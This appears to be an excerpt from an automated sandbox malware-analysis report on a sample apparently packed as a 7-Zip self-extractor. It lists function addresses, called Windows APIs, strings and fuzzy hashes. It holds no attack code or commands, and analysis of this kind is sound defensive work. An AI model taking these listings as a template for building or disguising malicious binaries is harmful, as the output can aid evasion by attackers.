Opcode Fuzzy Hash: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
Instruction Fuzzy Hash: 3BE08637000219BBCF115FA4EC41BCE3F55AF097A0F144626FA14A61F0D772C971AB99

Function 0040CAA0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040D0BE,00000001,00419858,00419858,0041549C,?,00405599,?,?), ref: 0040CAC3

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
Instruction ID: 88aaa84a90d32b64ed1f6dd0793a6e1d7fbd9e1969eb2b8b5a1cb2f912c455e2
Opcode Fuzzy Hash: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
Instruction Fuzzy Hash: 55E0C275640208FFDB01CF95C841BDE7BB9AB48354F10C169E9189A260D3799A50DF54

Function 00406E05 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_beginthreadex.MSVCRT ref: 00406E18

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: _beginthreadex
String ID:
API String ID: 3014514943-0
Opcode ID: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
Instruction ID: 033854197d412f734f15e9e19b3d909a116f00c1e253b1452bfc5409eef9a5ef
Opcode Fuzzy Hash: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
Instruction Fuzzy Hash: 97D017F6900208BFCF01EFA0CC45CEB3BADEB08204B004464B905C2110E671DA109BA0

Function 0040C9E5 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040C9FB

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
Instruction ID: 10957c0686827aba29bf6b3fca61d148a92be0f7cf9b29a220708a815fa9a989
Opcode Fuzzy Hash: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
Instruction Fuzzy Hash: 96E0EC75200208FFDB01CF90CD41FDE7BBEEB49754F208058E9049A160C7759A10EB54

Function 004127AA Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004127AF

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
Instruction ID: 86de7528c5b8e745b9feb2f1f2e8827419998e537f7b53f3733c02d1bff58703
Opcode Fuzzy Hash: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
Instruction Fuzzy Hash: 54D012B6A00108BBDB159F85E945BDEF778EB5135AF10402FB001A1540D7B85A519669

Function 0040CA73 Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON

Download Yara Rule

APIs

SetFileTime.KERNELBASE(?,?,?,?,0040CA9D,00000000,00000000,?,00401283,?), ref: 0040CA81

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: FileTime
String ID:
API String ID: 1425588814-0
Opcode ID: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
Instruction ID: de5aedd212665daa2fb0c30df7e581d57bf74256c4b77fd25e19f66411ac9bb8
Opcode Fuzzy Hash: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
Instruction Fuzzy Hash: 09C04C36158105FFCF020FB0CC04C5ABFA2AF99311F10C918B159C4070C7328024EB02

Function 0040CE83 Relevance: 1.3, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000060), ref: 0040CEFE

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
Instruction ID: cab80700ff2ef97e3e68849728e007b5961c94ff6a6edc9b3495ca6231c3d80c
Opcode Fuzzy Hash: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
Instruction Fuzzy Hash: 23214A32604246DBCB34AF61D8D086BB3A6AF403557244A3FE442776D1C738AC479BDA

Function 004032D9 Relevance: 1.3, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
Instruction ID: 04593239a52e0b24a0a84900efeb5de78bbbd7c33ac0e85a63675f9701e427e5
Opcode Fuzzy Hash: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
Instruction Fuzzy Hash: 92D0223230422029DA64393A0907AFF4C8C8F90361F00487FB804EA2C1ED7CCE81228D

Function 0040C88E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
Instruction ID: 46fd5d44533f688af1cbb16b01e3684df0873ba17e3ffd79ac6e97726efa63b3
Opcode Fuzzy Hash: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
Instruction Fuzzy Hash: 53D0123220456186DA782F7CB8C45C237D96E56331331476BF0B6D72E4D3788C835A98

Function 00402739 Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040D8FF,?,?,?,004096BF,?), ref: 00402755

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
Instruction ID: ef3627dbe8ede4864a94ca482c41f1f7a661cdc9e7d225e9ae9e2bc502ca7986
Opcode Fuzzy Hash: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
Instruction Fuzzy Hash: D5C0803014430079ED1137608E07B4936526B80716F50C465F344540F0D7F544005509

Function 00401CFA Relevance: 1.3, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,0040D8A7,00000000,?,0040D8F6,?,?,004096BF,?), ref: 00401D0C

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
Instruction ID: 1004f56851fc8b889ccfe642d75eb19623be02efc3220bf612975ac128c53eb9
Opcode Fuzzy Hash: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
Instruction Fuzzy Hash: 7FB09230544700FEEF224B00DE09B8A76A0ABC0B05F30C528B188641F087B56804EA09

Non-executed Functions

Function 0040385E Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 290comCOMMON

Download Yara Rule

APIs

_wtol.MSVCRT ref: 00403882
SHGetSpecialFolderPathW.SHELL32(00000000,?,DF20E863,00000000,00419828,00000000,0041981C), ref: 00403925
??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403996
??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 0040399E
??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 004039A6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 004039AE
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 004039B6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 004039BE
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 004039C6
_wtol.MSVCRT ref: 00403A1C
CoCreateInstance.OLE32(00416E70,00000000,00000001,00416E30,00405712,.lnk,?,0000005C), ref: 00403ABD
??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 00403B55
??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 00403B5D
??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 00403B65
??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 00403B6D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 00403B75
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 00403B7D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 00403B85
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 00403B8B
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 00403B93

Strings

.lnk, xrefs: 00403A9C

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
String ID: .lnk
API String ID: 408529070-24824748
Opcode ID: 4687d314d8fb75ddd968a622cf46a6a3741478a6a9264fdec0cf1fdc409c438a
Instruction ID: 6a4e2cb34307125d1aa254537a73282d765d300cba51a9a08192486ca10ed339
Opcode Fuzzy Hash: 4687d314d8fb75ddd968a622cf46a6a3741478a6a9264fdec0cf1fdc409c438a
Instruction Fuzzy Hash: 4DA18E71D10249ABDF14EFA1CC469EEBB78FF1430AF50442AF406B71A1DB389A42DB18

Function 00402187 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150stringCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
wsprintfW.USER32 ref: 004021E7
GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
GetLastError.KERNEL32 ref: 00402201
??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
GetLastError.KERNEL32 ref: 00402236
lstrcmpiW.KERNEL32(009B8FD0,00404926), ref: 0040224B
??3@YAXPAX@Z.MSVCRT(009B8FD0), ref: 0040225B
??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
SetLastError.KERNEL32(?), ref: 00402282
lstrlenA.KERNEL32(00416208), ref: 004022B6
??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
_wtol.MSVCRT ref: 00402314
MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,009B8FD0,00000002), ref: 00402334

Strings

7zSfxString%d, xrefs: 004021E1

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
String ID: 7zSfxString%d
API String ID: 2117570002-3906403175
Opcode ID: 61fc492217b0d1498c682d736bcbac8f2805dd0a68d8671c1b433b8af2a6413a
Instruction ID: 10ef73f62a445f8617660be723e0bbad3c81975cf04d4be1a7303cf9b6c1a78d
Opcode Fuzzy Hash: 61fc492217b0d1498c682d736bcbac8f2805dd0a68d8671c1b433b8af2a6413a
Instruction Fuzzy Hash: 82518171900604EFDB219FB5DD59BDABBB9EB48350B10807EE64EE62D0D774AD40CB28

Function 00401DC9 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
LockResource.KERNEL32(00000000), ref: 00401E2B
LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401E57
GetProcAddress.KERNEL32(00000000), ref: 00401E60
wsprintfW.USER32 ref: 00401E7F
LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401E94
GetProcAddress.KERNEL32(00000000), ref: 00401E97

Strings

%04X%c%04X%c, xrefs: 00401E79
kernel32, xrefs: 00401E47, 00401E4C, 00401E93
SetThreadPreferredUILanguages, xrefs: 00401E8E
SetProcessPreferredUILanguages, xrefs: 00401E42

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
API String ID: 2639302590-365843014
Opcode ID: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
Instruction ID: f9dda1162ec2f24eaafa78ee80fe21c3398d892f55d41869619f642ebc926886
Opcode Fuzzy Hash: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
Instruction Fuzzy Hash: B5214C72900608FBDB119FA4DC08FDF3ABDEB84711F158426FA05A6291D7B89D40CBA8

Function 00408DBF Relevance: 16.6, APIs: 11, Instructions: 96stringwindowCOMMON

Download Yara Rule

APIs

wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
GetLastError.KERNEL32 ref: 00408DF4
FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
lstrlenW.KERNEL32(?), ref: 00408E44
lstrlenW.KERNEL32(?), ref: 00408E4B
??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
LocalFree.KERNEL32(?), ref: 00408E9A

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
String ID:
API String ID: 829399097-0
Opcode ID: 8224ad20a8e9884b22f8a248acad8e8a60057fadc3095306321e9517c3750734
Instruction ID: c91527b0869a4d5de4249670dcf9d0912663d9707098e08fcc2f2580e19cfeee
Opcode Fuzzy Hash: 8224ad20a8e9884b22f8a248acad8e8a60057fadc3095306321e9517c3750734
Instruction Fuzzy Hash: 41218176800208FFDB149FA0DD85DEB7BACEF44354B10807BF945A6190EF34AE858BA4

Function 00402EE6 Relevance: 16.6, APIs: 11, Instructions: 90filestringCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,004155D0,?,?,?,00000000), ref: 00402F15
lstrcmpW.KERNEL32(?,004155CC,?,0000005C,?,?,?,00000000), ref: 00402F68
lstrcmpW.KERNEL32(?,004155C4,?,?,00000000), ref: 00402F7E
SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402F94
DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402F9B
FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402FAD
FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402FBC
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402FC7
RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402FD0
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FDB
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FE6

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 1862581289-0
Opcode ID: 92f2922bb31e58a36d0fd1269f7fa419c1fabea0f355f97580af1b0c87fe8d09
Instruction ID: e3ea1660441bcf3a3f7f20395b47020d8d3d19c9c96888f58badb5dcc8a6e628
Opcode Fuzzy Hash: 92f2922bb31e58a36d0fd1269f7fa419c1fabea0f355f97580af1b0c87fe8d09
Instruction Fuzzy Hash: 7A218631A04209FBDB11AB71DD8DFEF3B7CAF44745F50407AB805B21D0EBB89A459A68

Function 00408630 Relevance: 7.5, APIs: 5, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0040864F
SetWindowsHookExW.USER32(00000007,Function_00008576,00000000,00000000), ref: 0040865A
GetCurrentThreadId.KERNEL32 ref: 00408669
SetWindowsHookExW.USER32(00000002,Function_00008602,00000000,00000000), ref: 00408674
EndDialog.USER32(?,00000000), ref: 0040869A

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: CurrentHookThreadWindows$Dialog
String ID:
API String ID: 1967849563-0
Opcode ID: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
Instruction ID: a1df587bc44f7b8848174d41fcc6ca6bf5c09d6170abc4bd78dad765c28a629c
Opcode Fuzzy Hash: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
Instruction Fuzzy Hash: 93012671600218DFD3106B7AED44AB3F7ECEB85755B12843FE202921A0CAB79C008F6C

Function 0040244E Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(00406032,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0000000A,-00000008,00406032,?,00000000,0000000A), ref: 00402487
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00402499
FreeSid.ADVAPI32(?), ref: 004024A2

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
Instruction ID: fcbafef67fd355d70295d2c1b6ce6e7585022550186800af39a78ba60eef4ec0
Opcode Fuzzy Hash: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
Instruction Fuzzy Hash: F7F03C72944288FEDB01DBE88D85ADEBF7CAB18304F8480AAA101A2182D2705704CB69

Function 0040AD30 Relevance: .5, Instructions: 479COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID:
String ID:
API String ID:
